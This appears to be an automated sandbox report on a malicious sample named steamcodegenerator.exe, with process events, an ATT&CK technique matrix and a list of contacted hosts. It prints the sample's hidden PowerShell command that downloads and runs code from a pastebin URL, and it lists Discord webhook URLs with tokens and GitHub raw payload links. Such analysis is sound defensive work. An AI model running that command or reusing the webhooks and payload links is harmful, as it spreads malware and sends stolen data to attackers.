Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C078F80 cpuid 0_2_00007FF71C078F80
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF71C074524
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: EnumSystemLocalesW,0_2_00007FF71C073E38
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: EnumSystemLocalesW,0_2_00007FF71C073F08
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF71C073FA0
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: GetLocaleInfoW,0_2_00007FF71C06B7F8
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: GetLocaleInfoW,0_2_00007FF71C0741E8
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00007FF71C073ADC
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF71C074340
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: EnumSystemLocalesW,0_2_00007FF71C06B378
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: GetLocaleInfoW,0_2_00007FF71C0743F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C059880 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF71C059880
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
Windows Management Instrumentation
11
Registry Run Keys / Startup Folder
11
Process Injection
1
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Web Service
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell
1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
131
Virtualization/Sandbox Evasion
LSASS Memory1
Query Registry
Remote Desktop ProtocolData from Removable Media11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
Registry Run Keys / Startup Folder
11
Process Injection
Security Account Manager131
Security Software Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
NTDS1
Process Discovery
Distributed Component Object ModelInput Capture3
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets131
Virtualization/Sandbox Evasion
SSHKeylogging14
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials1
Application Window Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync2
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem33
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534102 Sample: steamcodegenerator.exe Startdate: 15/10/2024 Architecture: WINDOWS Score: 96 45 pastebin.com 2->45 47 raw.githubusercontent.com 2->47 49 3 other IPs or domains 2->49 69 Suricata IDS alerts for network traffic 2->69 71 Malicious sample detected (through community Yara rule) 2->71 73 Multi AV Scanner detection for submitted file 2->73 77 2 other signatures 2->77 9 steamcodegenerator.exe 14 2->9         started        13 forfiles.exe 1 2->13         started        15 forfiles.exe 1 2->15         started        signatures3 75 Connects to a pastebin service (likely for C&C) 45->75 process4 dnsIp5 51 github.com 140.82.121.3, 443, 49711 GITHUBUS United States 9->51 53 objects.githubusercontent.com 185.199.111.133, 443, 49712 FASTLYUS Netherlands 9->53 79 Suspicious powershell command line found 9->79 81 Found direct / indirect Syscall (likely to bypass EDR) 9->81 17 powershell.exe 12 9->17         started        20 conhost.exe 9->20         started        22 powershell.exe 7 13->22         started        24 conhost.exe 1 13->24         started        26 powershell.exe 15->26         started        28 conhost.exe 1 15->28         started        signatures6 process7 signatures8 63 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 17->63 65 Suspicious powershell command line found 17->65 67 Powershell creates an autostart link 17->67 30 powershell.exe 15 20 17->30         started        35 powershell.exe 13 22->35         started        37 powershell.exe 26->37         started        process9 dnsIp10 55 raw.githubusercontent.com 185.199.109.133, 443, 49791, 49797 FASTLYUS Netherlands 30->55 57 discord.com 162.159.138.232, 443, 49898, 49983 CLOUDFLARENETUS United States 30->57 43 C:\ProgramData\...\BeginSync.lnk, MS 30->43 dropped 61 Tries to open files direct via NTFS file id 30->61 39 conhost.exe 30->39         started        41 attrib.exe 1 30->41         started        59 pastebin.com 172.67.19.24, 443, 49894, 49900 CLOUDFLARENETUS United States 35->59 file11 signatures12 process13

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
steamcodegenerator.exe42%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
https://oneget.org0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
discord.com
162.159.138.232
truetrue
    unknown
    github.com
    140.82.121.3
    truefalse
      unknown
      raw.githubusercontent.com
      185.199.109.133
      truetrue
        unknown
        objects.githubusercontent.com
        185.199.111.133
        truefalse
          unknown
          pastebin.com
          172.67.19.24
          truetrue
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
              unknown
              http://pastebin.com/raw/sA04Mwk2false
                unknown
                https://pastebin.com/raw/sA04Mwk2false
                  unknown
                  https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txtfalse
                    unknown
                    https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2true
                      unknown
                      http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txtfalse
                        unknown
                        https://github.com/user-attachments/files/17267811/stm.txtfalse
                          unknown
                          http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
                            unknown
                            https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSItrue
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://objects.githubusercontent.com/2steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000003.2201099145.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_powershell.exe, 00000011.00000002.2874987774.000001D184C70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184B34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C6C000.00000004.00000800.00020000.00000000.sdmptrue
                                  unknown
                                  https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNpowershell.exe, 00000006.00000002.2593081552.000001FB81649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB81E52000.00000004.00000800.00020000.00000000.sdmptrue
                                    unknown
                                    https://contoso.com/Licensepowershell.exe, 00000006.00000002.2657006446.000001FB9006F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://discord.com/powershell.exe, 00000006.00000002.2593081552.000001FB81F9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39D2B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185681000.00000004.00000800.00020000.00000000.sdmptrue
                                      unknown
                                      http://discord.compowershell.exe, 00000006.00000002.2593081552.000001FB81E52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39D17E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185636000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://github.com/user-attachments/files/17267811/stm.txtiRsteamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://raw.githubusercontent.comppowershell.exe, 00000006.00000002.2593081552.000001FB80391000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://discord.com/api/webhooks/128545359042878powershell.exe, 0000000D.00000002.2798056511.000002B39D17E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185636000.00000004.00000800.00020000.00000000.sdmptrue
                                              unknown
                                              https://github.com/steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://contoso.com/powershell.exe, 00000006.00000002.2657006446.000001FB9006F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2392788423.000001663B9CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2392788423.000001663BB02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2376546046.000001662D22A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2657006446.000001FB901B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2657006446.000001FB9006F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://github.com/user-attachments/files/17267811/stm.txtllsteamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://oneget.orgXpowershell.exe, 00000004.00000002.2376546046.000001662CDB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://raw.githubusercontepowershell.exe, 00000006.00000002.2593081552.000001FB80FE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2376546046.000001662B951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39BCED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184123000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://0.discord.com/powershell.exe, 00000006.00000002.2593081552.000001FB81F9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39D2B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185681000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2392788423.000001663B9CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2392788423.000001663BB02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2376546046.000001662D22A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2657006446.000001FB901B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2657006446.000001FB9006F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000004.00000002.2376546046.000001662CDB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://discord.compowershell.exe, 0000000D.00000002.2798056511.000002B39D17E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185636000.00000004.00000800.00020000.00000000.sdmptrue
                                                          unknown
                                                          https://objects.githubusercontent.com/tsteamcodegenerator.exe, 00000000.00000003.2187911601.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2593081552.000001FB80224000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQpowershell.exe, 0000000D.00000002.2798056511.000002B39C85F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184C70000.00000004.00000800.00020000.00000000.sdmptrue
                                                              unknown
                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2593081552.000001FB80224000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://github.com/user-attachments/files/17267811/stm.txtFsteamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://go.micropowershell.exe, 00000006.00000002.2593081552.000001FB80FE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C1DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D18470A000.00000004.00000800.00020000.00000000.sdmptrue
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://github.com/user-attachments/files/17267811/stm.txtEsteamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://contoso.com/Iconpowershell.exe, 00000006.00000002.2657006446.000001FB9006F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://raw.githubusercontpowershell.exe, 00000006.00000002.2593081552.000001FB815FD000.00000004.00000800.00020000.00000000.sdmptrue
                                                                      unknown
                                                                      https://discord.ppowershell.exe, 00000006.00000002.2593081552.000001FB81F9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2593081552.000001FB80224000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
